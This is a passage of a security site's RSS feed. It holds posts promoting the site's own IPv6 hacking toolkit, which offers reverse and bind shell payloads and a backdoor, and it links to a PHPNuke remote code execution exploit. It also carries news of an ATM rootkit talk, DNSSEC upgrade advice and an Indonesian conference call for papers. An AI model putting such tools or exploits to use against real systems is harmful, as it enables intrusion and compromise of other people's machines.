		<category><![CDATA[News]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[IPv6 Hacking]]></category>
		<category><![CDATA[Tool]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=166</guid>
		<description><![CDATA[IPv6 is future protocol internet with rich of security features but hackers always do research and try to exploit it. Times by times, days by days, papers and presentations which explains who to defeat this protocol are widely published. Van Hauser of The Hacker Choice (THC) releases his IPv6 attack toolkit to exploit IPv6 protocol [...]]]></description>
				<content:encoded><![CDATA[<p>IPv6 is future protocol internet with rich of security features but hackers always do research and try to exploit it. Times by times, days by days, papers and presentations which explains who to defeat this protocol are widely published. Van Hauser of The Hacker Choice (THC) releases his IPv6 attack toolkit to exploit IPv6 protocol weakness. His tools can be freely downloaded on <a href="http://freeworld.thc.org/download.php?t=r&amp;f=thc-ipv6-0.6.tar.gz">THC website</a>. HD Moore, author Metasploit project wrote paper about <em>Exploiting Tomorrow&#8217;s Internet Today: Penetration testing with IPv6 </em>which can be read on <a href="http://www.uninformed.org/?v=10&amp;a=3&amp;t=txt">http://uninformed.org</a>. His paper tells us about exploitingÂ  IPv6 applications by  proxying/relaying via IPv4.</p>
<p>IPSECS, unofficially releases his IPv6 Hackit on sourceforge and papers which nearly complete explains IPv6 exploitation. His papers content of :</p>
<ul>
<li>Introduction to IPv6</li>
<li>Connecting to IPv6 Backbone (IPv6-in-IPv4 Tunneling using TSP)</li>
<li>An Introduction to IPv6 Socket Programming</li>
<li>IPv6 Discovery &amp; Scanning (via ICMP, TCP, DNS)</li>
<li>Writing IPv6 Remote Exploit &amp; Shellcoding (Stack Based Buffer Overflow, Format String)</li>
<li>IPv6 Protocol Vulnerability (Man In The Middle, Denial of Service)</li>
</ul>
<p>You can freely download this paper on <a href="http://core.ipsecs.com/paper/0x01-ipv6-attack.txt">core.ipsecs.com</a> written in Indonesian. IPSECS wrote IPv6-Hackit using Perl Scripting Language which means that the tools don&#8217;t need to be compiled. Somehow, this tool needs some perl module to be installed:</p>
<ul>
<li>strict</li>
<li>warnings</li>
<li>Switch</li>
<li>English</li>
<li>Net::DNS</li>
<li>POSIX</li>
<li>Getopt::Long</li>
<li>LWP::UserAgent</li>
<li>HTTP::Message</li>
<li>IO::Socket::INET6</li>
</ul>
<p>This tool supports to do:</p>
<ul>
<li>Hosts Enumeration finding which host is up/down.</li>
<li>TCP Port scanning to find which port is open/close.</li>
<li>Googling via unix shell to find possible IPv6 domains.</li>
<li>Finding AAAA IPv6 host record from single or massive collected domains.</li>
<li>Getting shell from IPv6 binding shellcode/payload.</li>
<li>Getting shell from IPv6 reverse shellcode/payload.</li>
<li>Exploiting simple IPv6 application weakness (currently this module is still developed)</li>
<li>IPv6 Binding backdoor with authentication (currently this module is still developed)</li>
</ul>
<p>You can easily download this IPv6 Hackit on <a href="http://ipv6hackit.sourceforge.net/download/ipv6hackit-v0.1.tar.gz">ipv6hackit.sourceforge.net</a>. Meanwhile you play this tools and read the paper, now we develope grid-toolkit to be released soon. So just follow and watch this website, IPSECS just gives best stuff to play with! Finally enjoy guys!</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=166</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hacker develops multi-platform rootkit for ATMs</title>
		<link>http://ipsecs.com/web/?p=155</link>
		<comments>http://ipsecs.com/web/?p=155#comments</comments>
		<pubDate>Fri, 07 May 2010 23:13:37 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[ATM]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=155</guid>
		<description><![CDATA[One year after his Black Hat talk on Automated Teller Machine security vulnerabilities was yanked by his employer, security researcher Barnaby Jack plans to deliver the talk and disclose a new ATM rootkit at the computer security conference. He plans to give the talk, entitled &#8220;Jackpotting Automated Teller Machines,&#8221; at the Black Hat Las Vegas [...]]]></description>
				<content:encoded><![CDATA[<p class="first">One year after his Black Hat talk on Automated Teller  Machine security vulnerabilities was <a href="http://www.networkworld.com/news/2009/063009-juniper-nixes-atm-security.html">yanked  by his employer</a>, security researcher Barnaby Jack plans to deliver  the talk and disclose a new ATM rootkit at the computer security  conference.</p>
<p>He plans to give the talk, entitled &#8220;Jackpotting Automated Teller  Machines,&#8221; at the Black Hat Las Vegas conference, held July    28 and 29.</p>
<p>Jack will demonstrate several ways of attacking ATM machines,  including remote, network-based attacks. He will also reveal    a &#8220;multi-platform ATM rootkit,&#8221; and will discuss things that the ATM  industry can do to protect itself from such attacks,    he writes in his description of the talk, <a href="https://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html">posted  this week to the Black Hat Web site.</a></p>
<p>Jack was set to discuss ATM security problems at last year&#8217;s  conference, but his employer, Juniper Networks, made him pull    the presentation after getting complaints from an ATM maker that was  worried that the information he had discovered could    be misused.</p>
<p>The security researcher found a straightforward way of getting around  Juniper&#8217;s objections, however. Last month, he took a    new job as director of security research with IOActive.</p>
<p>ATM machines do get compromised, but in a roundabout way. Thieves  often hit them by installing card skimmers on them to extract    magnetic stripe data from the cards. Then, using a hidden video  camera, they steal login numbers. Using all of this information,    the crooks can build their own duplicate cards and empty bank  accounts.</p>
<p>But Jack&#8217;s talk looks at a new area: bugs in the software used to run  the machines.</p>
<p>He&#8217;s taken advantage of the extra year provided by Juniper&#8217;s ban to  do more research. &#8220;Last year, there was one ATM; this    year, I&#8217;m doubling down and bringing two new model ATMs from two  major vendors,&#8221; Jack says in his talk description. The security    researcher couldn&#8217;t immediately be reached for comment.</p>
<p>Jack doesn&#8217;t say which ATMs he plans to discuss, but it could be any  major vendor, according to Black Hat Director Jeff Moss.    &#8220;He&#8217;s got a living room full of a lot of different brands of ATMs,  and they all seem to suffer from one or the other problem,&#8221;    he said.</p>
<p>ATMs haven&#8217;t received a lot of serious scrutiny by security  researchers, so Jack&#8217;s talk will break new ground, Moss said.    &#8220;Apparently you can make all the money come out,&#8221; he said.</p>
<p><strong>Source</strong>: <a href="http://www.networkworld.com/news/2010/050610-hacker-develops-multi-platform-rootkit-for.html">www.networkland.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=155</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHPNuke 7.0/8.1/8.1.35 Remote Code Execution</title>
		<link>http://ipsecs.com/web/?p=150</link>
		<comments>http://ipsecs.com/web/?p=150#comments</comments>
		<pubDate>Thu, 06 May 2010 22:53:05 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=150</guid>
		<description><![CDATA[PHPNuke is old and mature Content Management System (CMS), but once again hacker proofes us that&#8217;s nothing 100% secure. Its maturity doesn&#8217;t guarantee its security, PHPNuke is vulnerable to remote code execution which can be exploited to compromise apache user. Most fearsome statement from the author of the exploit is that about wormable remote code [...]]]></description>
				<content:encoded><![CDATA[<p>PHPNuke is old and mature Content Management System (CMS), but once again hacker proofes us that&#8217;s nothing 100% secure. Its maturity doesn&#8217;t guarantee its security, PHPNuke is vulnerable to remote code execution which can be exploited to compromise apache user. </p>
<p>Most fearsome statement from the author of the exploit is that about wormable remote code execution in PHPNuke. Since PHPNuke is one of the most popular CMS used by many webmasters, then how many sites will be compromised? Well then, just take the proof of concept <a href="http://www.exploit-db.com/exploits/12510">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=150</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Last minute checks for DNSSEC upgrade</title>
		<link>http://ipsecs.com/web/?p=143</link>
		<comments>http://ipsecs.com/web/?p=143#comments</comments>
		<pubDate>Thu, 06 May 2010 22:18:08 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=143</guid>
		<description><![CDATA[Network admins prepare for internet security upgrade. Network administrators are being encouraged to run some last minute checks on their DNS servers, routers and firewallsÂ before the final cluster of the internet&#8217;s root servers are loaded up with the DNSSEC security upgrade tomorrow night. As reported late last week on iTnews.com.au, from May 5 the DNSSEC [...]]]></description>
				<content:encoded><![CDATA[<h4 class="article-intro-text">Network admins prepare for internet  security upgrade.</h4>
<p>Network administrators are being encouraged to run some last  minute checks on their DNS servers, routers and firewallsÂ before the  final cluster of the internet&#8217;s root servers are loaded up with the  DNSSEC security upgrade tomorrow night.</p>
<p>As <a title="Why your internet might fail on May 5" href="http://www.itnews.com.au/News/173412,warning-why-your-internet-might-fail-on-may-5.aspx">reported late last week  on <em>iTnews.com.au</em></a>, from May 5 the DNSSEC upgrade will attach a  digital signature to <em>every</em> response from the root servers where  the DNS resolver is configured to request signed answers (via setting  the DO bit in the Extensions to DNS &#8211; EDNS settings) to requests for an  internet page, in order to provide an additional layer of assurance for  internet users that they are connecting to the correct page.</p>
<p>Concerns have been raised that the upgrade might cause some problems  for network administrators working with older networking equipment that  is preconfigured to either not accept DNS responses over 512 bytes or  not accept DNS responses split into several packets using the TCP  protocol.</p>
<p>ICANN&#8217;s latest update on the upgrade, released yesterday, confirmed  that root server cluster &#8216;J-Root&#8217; is the last of 13 root server clusters  to transition to DNSSEC on May 5 at 1700 &#8211; 1900 UTC.<span id="more-143"></span></p>
<p>ICANN said that &#8220;no harmful effects&#8221; have been identified from the 12  root server clusters upgraded to date.</p>
<p>But observers are nonetheless recommending network administrators run  a series of final checks using the following tools:</p>
<p>- A reply-size test available at DNS-OARC:<br />
<a href="https://www.dns-oarc.net/oarc/services/replysizetest" target="_blank">https://www.dns-oarc.net/oarc/services/replysizetest</a></p>
<p>- Ripe Labs&#8217; &#8216;Test your DNS Resolver&#8217;<br />
<a href="http://labs.ripe.net/content/testing-your-resolver-dns-reply-size-issues" target="_blank">http://labs.ripe.net/content/testing-your-resolver-dns-reply-size-issues</a></p>
<p><em>- iTnews</em> readers have also recommended an <a href="http://netalyzr.icsi.berkeley.edu/" target="_blank">automated tool</a> developed  by the University of California at Berkeley and <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=7a005a14-f740-4689-8c43-9952b5c3d36f&amp;displaylang=en" target="_blank">Microsoft&#8217;s  guide to DNSSEC on Windows Server 2008 R2</a>.</p>
<p><strong>AdviceÂ for corporate networks</strong></p>
<p>Melbourne IT chief strategy officer and ICANN board member Bruce  Tonkin recommends that network operators and DNS managers review  configuration settings on networking equipment &#8211; checking whether their  equipment can handle DNS requests with larger packet sizes than 512  bytes or requestsÂ sent in multiple packetsÂ via the TCP protocol.</p>
<p>Operators should alsoÂ &#8221;consider whether changes to UDP packet size  limits will improve overall performance, and consider whether DNS  resolvers should be configured to request the DNSSEC information or not  in the short term,&#8221; Tonkin said.</p>
<p>Internode network engineerÂ  Mark NewtonÂ recommended <a href="http://blog.internode.on.net/2010/05/03/dnssec-and-what-it-means-to-you/" target="_blank">in  a company blog</a> that firewall administrators ensure the company&#8217;s  firewall is permitting DNS over TCP/53, and that fragmented DNS  responses over UDP or TCP aren&#8217;t blocked.</p>
<p>Should tests using the tools listed above fail, Newton asks that  administrators consider a firmware upgrade.</p>
<p>&#8220;Read-up on the nature of the problem, and understand that TCP/53 has  always been a valid part of the DNS protocol, and that blocking it  isn&#8217;t industry best practice, it&#8217;s a configuration error,&#8221; Newton said.</p>
<p><strong>Checklist for ISP subscribers</strong></p>
<p>By and large, internet service providers are expected to have  prepared for the DNSSEC upgrade.</p>
<p>Australia&#8217;s largest ISP, Telstra, said it &#8220;supported the introduction  of DNSSEC&#8221; and did not anticipate customers would suffer any  connectivity issues on May 5.</p>
<p>Primus, also queried as to whether its DNS servers were prepared, was  also confident the upgrade will prove smooth sailingÂ for its  subscribers.</p>
<p>&#8220;Be assured we have taken steps to ensure there will be no issues for  customers,&#8221; said Ravi Bhatia, CEO at Primus.</p>
<p>Internode has investigated its own systems and expects to be fully  compliant with DNSSEC.</p>
<p>But whilst assuring that &#8220;the overwhelming majority of customers  won&#8217;t notice anything&#8221;, Newton took a measured approach.</p>
<p>&#8220;Our customer service staff will try their best to assist people with  DNS problems after May 5th, but please understand that it&#8217;s possible  that any problems you experience may be caused by deficiencies in your  own equipment,&#8221; Newton said <a href="http://blog.internode.on.net/2010/05/03/dnssec-and-what-it-means-to-you/" target="_blank">in  a company blog</a>.</p>
<p>&#8220;Although it&#8217;s very unlikely, it remains possible that you&#8217;ll need to  purchase a new firewall or a new ADSL modem after May 5 if your current  equipment is old enough to have problems which haven&#8217;t been fixed by  the vendor because they&#8217;re no longer offering support for your product.&#8221;</p>
<p>Customers with ADSL modems that stop working correctly after May  5Â should also consider a firmware upgrade, Newton said.</p>
<p>&#8220;If that doesn&#8217;t help, try disabling your ADSL modem&#8217;s DNS proxy,  which will cause you to use our DNS servers (which we&#8217;ve tested with  DNSSEC) instead of your ADSL modem&#8217;s possibly-faulty built-in DNS  server.&#8221;</p>
<p><strong>Source</strong> : http://www.itnews.com.au/News/173746,last-minute-checks-for-dnssec-upgrade.aspx</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=143</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>idsecconf 2009 Call For Paper</title>
		<link>http://ipsecs.com/web/?p=129</link>
		<comments>http://ipsecs.com/web/?p=129#comments</comments>
		<pubDate>Thu, 17 Sep 2009 08:00:01 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=129</guid>
		<description><![CDATA[Kami dari komite idsecconf 2009 memberi kesempatan pada rekan-rekan penggiat keamanan komputer di seluruh Indonesia untuk berpartisipasi lewat penyerahan paper. Topik yang kami cari adalah seperti di bawah ini: * Web hacking * Wireless hacking * Metode Penetration testing * Forensic dan Anti Forensic * Kriptografi * Fuzzing * Exploit writing * System hardening * [...]]]></description>
				<content:encoded><![CDATA[<p>Kami dari komite idsecconf 2009 memberi kesempatan pada rekan-rekan penggiat keamanan komputer di seluruh Indonesia untuk berpartisipasi lewat penyerahan paper. Topik yang kami cari adalah seperti di bawah ini:</p>
<p>    * Web hacking<br />
    * Wireless hacking<br />
    * Metode Penetration testing<br />
    * Forensic dan Anti Forensic<br />
    * Kriptografi<br />
    * Fuzzing<br />
    * Exploit writing<br />
    * System hardening<br />
    * Lock Picking<br />
    * Open Hardware Implementation</p>
<p>Jika anda memiliki judul paper diluar cakupan topik diatas, kami masih terbuka untuk mempertimbangkannya selama masih berkaitan dengan security.</p>
<p>Format paper adalah file Open Office Writer dengan ukuran halaman &#8220;Letter&#8221; Gambar bisa langsung disisipkan ke dalam dokumen atau dibuat terpisah. Format gambar adalah PNG dengan ukuran dimensi maksimal (lebar x tinggi ) 640 x 480 pixel dengan resolusi 72 pixel per inch. Jika nama file dipisahkan, mohon nama file dirujuk dari naskah. Setiap gambar harap disertai keterangan secukupnya.</p>
<p>Naskah yang dikirimkan juga sudah harus mencakup:</p>
<p># Nick, email dan nomer telepon yang bisa dihubungi<br />
# Biografi singkat, afiliasi, dan achievement (Maksimal 250 Kata).<br />
# Rangkuman dari Persentasi (Abstraksi)(Maksimal 1250 Kata)<br />
# Peralatan Pendukung yang dibutuhkan (video, internet, wireless, audio, etc.)<br />
# Durasi yang di butuhkan (60 menit, 90 menit, 120 menit)</p>
<p>Pengiriman naskah ditujukan ke e-mail address: submitHAPUSHURUFBESAR@idsecconf.org dan<br />
diterima paling lambat Jumat, 18 September 2009.</p>
<p>Keputusan penerimaan atau penolakan paper adalah sepenuhnya wewenang komite idsecconf 2009 dan tidak bisa diganggu gugat. Bagi yang papernya diterima, akan menerima pemberitahuan tertulis lewat e-mail untuk persiapan presentasi on-stage pada acara idsecconf 2009.</p>
<p>Kami tunggu partisipasi anda semuanya!</p>
<p>salam,</p>
<p>komite idsecconf 2009</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=129</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
